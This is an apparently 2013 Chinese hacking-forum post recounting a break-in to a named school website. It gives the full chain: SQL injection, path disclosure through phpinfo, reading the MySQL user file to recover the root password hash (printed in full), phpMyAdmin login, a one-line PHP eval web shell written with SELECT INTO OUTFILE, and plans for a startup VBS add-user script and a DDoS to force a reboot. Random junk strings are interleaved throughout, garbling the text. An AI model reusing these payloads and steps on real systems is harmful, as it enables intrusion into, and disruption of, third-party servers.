第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
4 m, P) ?1 {2 E5 s1 @发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
- E! R$ v3 P- [) Z; i. M" c: D g1 t0 v
5 x( o. m8 ? b! V% w' v$ f
1 v8 [5 o7 {" E- F( }常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 # A. c( t2 }( X$ j
4 l$ k: b) w) T; \" _
那么想可以直接写入shell ,getshell有几个条件:" v9 [8 v9 R1 I t! A$ F
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
' ]0 T: ~; v/ o, G4 l6 }
' s. M: Z/ i/ o* n0 f0 L4 v试着爆绝对路径:
- q: K7 Y$ } r# X1./phpMyAdmin/index.php?lang[]=1
. u$ w! D9 t8 d) d: B% r L9 O2./phpMyAdmin/phpinfo.php ( h! u5 J$ I0 l$ J. a
3./load_file()
; F: e+ Y0 e9 p( ~) U4./phpmyadmin/themes/darkblue_orange/layout.inc.php 4 R9 [+ m3 R8 f& A% ]4 D
5./phpmyadmin/libraries/select_lang.lib.php - F* g- q, L/ C+ x/ r/ i! ~
6./phpmyadmin/libraries/lect_lang.lib.php
- E, x; \; {8 ^5 r8 ^+ q7./phpmyadmin/libraries/mcrypt.lib.php
/ \+ K7 |* K& h! @# M& c3 K7 M8./phpmyadmin/libraries/export/xls.php
5 |3 G2 B0 ]- x1 _- {( L/ I3 P6 \, y- \( J+ ~
均不行........................... 1 b0 G- D: d0 |3 ]. w# f& ]% E" ?! I8 ?) q
; O' H1 Z! f5 q2 c3 u8 y+ [御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
9 z/ a0 `! N# m! f4 P) C$ U1 q1 N; Z1 D& Q/ y7 F' m
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin : }. T. E9 ^3 @
( \9 C, S9 I3 r: s; z* g默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
" x. [% K# a+ k3 j2 u& w- f1 [8 @6 E) [1 Y0 T6 n
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... / Z( s+ H I: K0 P5 H
8 Z# Z& v7 S+ i; V2 X% {" s
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell & U- [4 s `5 C' X% _' |( C: C
- P' h0 Y0 K: T, Z3 I+ V2 N# H! x7 Q& m
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini * j6 n' @: V! g/ L u/ T! |+ u4 Y+ P
7 h8 K2 `" k! h4 K: H& p2 W6 d
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 4 t7 D4 b+ u! s4 Y6 P
3 R% \: c6 P9 u E
成功读到root密码:
) F* Q3 S3 y2 e1 c9 H! v6 p( @- V) K i% m; _- F7 t, T7 a% W
17---- r(0072) 8 r s9 }+ ~9 K% V* h5 y2 M
18---- o(006f) : n" l- v: M/ y- A5 I
19---- o(006f) 8 I; A! B9 ^$ D2 S0 H
20---- t(0074)
/ h! W# J! |8 J+ X" \1 I2 z21---- *(002a)
. M1 U) m- D- i3 s7 m* }1 \6 N& L4 k7 x22---- 8(0038)
4 W0 ]3 R5 d; G' n2 t7 y/ e1 m23---- 2(0032)
. U5 L. K- H' j( T3 E9 Z/ U24---- E(0045)
. Q6 H. h0 Y' x2 p( [25---- 1(0031)
1 [7 @! k5 Z0 m3 S8 `26---- C(0043)
0 r; i: ^+ y' T' P27---- 5(0035)
4 x; j; `; F3 R28---- 8(0038)
6 R3 L! @. @' ?29---- 2(0032)
# L& n& [+ K9 E7 L" P30---- 8(0038) 4 g/ Y* F5 [' O1 W9 R
31---- A(0041) % ~- j; w& f3 |# s5 e" ^2 E
32---- 9(0039)
- b; T1 u1 {3 Y0 L* c' p6 [33---- B(0042) ; C- k2 q' i7 v+ `
34---- 5(0035) * Z0 r+ z1 z( F- r1 b$ y8 |( X
35---- 4(0034) 6 m- i: c m' w7 Q$ W1 W# H
36---- 8(0038) * e2 l. u+ _, q6 s0 {/ d: v
37---- 6(0036)
- A+ z) \$ f3 V9 p+ u( }38---- 4(0034)
* {8 @# o2 M" }1 V" u5 ]39---- 9(0039)
. \ l) x' Z7 |4 y- a7 X) q40---- 1(0031) , e4 a% F) q q% E. }$ i
41---- 1(0031)
4 |* A! Z' p H( Q42---- 5(0035)
: B4 e z. N) I9 E* G `43---- 3(0033) : u- R8 Q. |4 ~. r& P* G, s- t1 v
44---- 5(0035) ) q P1 q+ i4 b1 d* J2 _* X1 o
45---- 9(0039) 0 m/ e, y' z( F
46---- 8(0038)
' @4 F b9 r1 P47---- F(0046) $ I, n* O, ~$ Q r$ L
48---- F(0046)
+ \5 d; y5 |5 O49---- 4(0034) 1 x" G4 K2 X, O& O9 ~# K* O
50---- F(0046) ' |, W2 J0 A; S4 \5 h
51---- 0(0030)
( I# |3 t- {) T- T52---- 3(0033)
- ?" B' K! w, i# f6 E: ?53---- 2(0032)
7 ^0 l: A/ Q S1 {0 W1 r54---- A(0041)
9 {/ s7 n( G& `% @55---- 4(0034)
' E# M. I: y: |! N8 [/ M56---- A(0041) 6 L1 e5 f" y) u: f* n% S
57---- B(0042)
2 h* u: ^3 q/ j+ Y5 d7 G& ]58---- *(0044) 8 u2 S; r% ?+ o' l' w( U/ P0 ? w0 t
59---- *(0035)
5 N7 I! v$ y; U, Q3 E60---- *(0041) & |/ p8 I* _- n$ q
61---- *0032) 5 f; n0 B% E3 n
0 H3 h- _6 u% [: s* _% J2 M: L) \解密后成功登陆phpmyamin
+ n0 ^5 h6 r4 y( U9 s * o( A( C* D: E3 \
' e4 z! M0 P% S O6 k ?; ^
# \% H8 `- w( S( I5 |, p
# Z4 J2 N. D. q找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
" w: }& ~0 z8 _$ @+ a3 n: F& i# r% O& n) ]- Z: G
成功执行,拿下shell,菜刀连接:
7 }- L. o5 p' ~9 T2 w
1 a( h e" |/ T0 t服务器不支持asp,aspx,php提权无果...................
4 Y& _" L* C B$ k( ~2 D) g2 p1 f& Q1 \7 d/ Z8 b1 e
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
! [8 b8 C! B2 e O服务器上已经有个隐藏帐号了
s+ h7 z5 A4 n! n+ m! }别名 administrators; E3 o& L s7 B3 }
注释 管理员对计算机/域有不受限制的完全访问权
4 l/ `! @9 S B" E: p4 S成员 " ? A; ^5 r( ]
-------------------------------------------------------------------------------4 K# U: J% x& i' }
admin! [4 m( y- {( T, S
Administrator
V: B/ d7 r5 i) e. ~8 `) H: bslipper$
6 ?6 t9 a/ g7 e- |sqluser8 ?" \: X2 P# z# d
命令成功完成。
/ f( |# ^) X3 j' v4 u/ I j/ \ T, o" Z4 `, z4 t
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
; ]; h$ ]9 o8 O6 |. `4 j1 \8 s* _. u4 F& O& a: a. G8 I
ddos服务器重启,不然就只能坐等服务器重启了...............................% d. q, C! R7 ?, V1 Y6 s
( ~3 Y" U. b* J+ t9 z5 ]
0 ~9 E+ j: |4 L8 ~0 \2 Y, ?4 r1 E | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
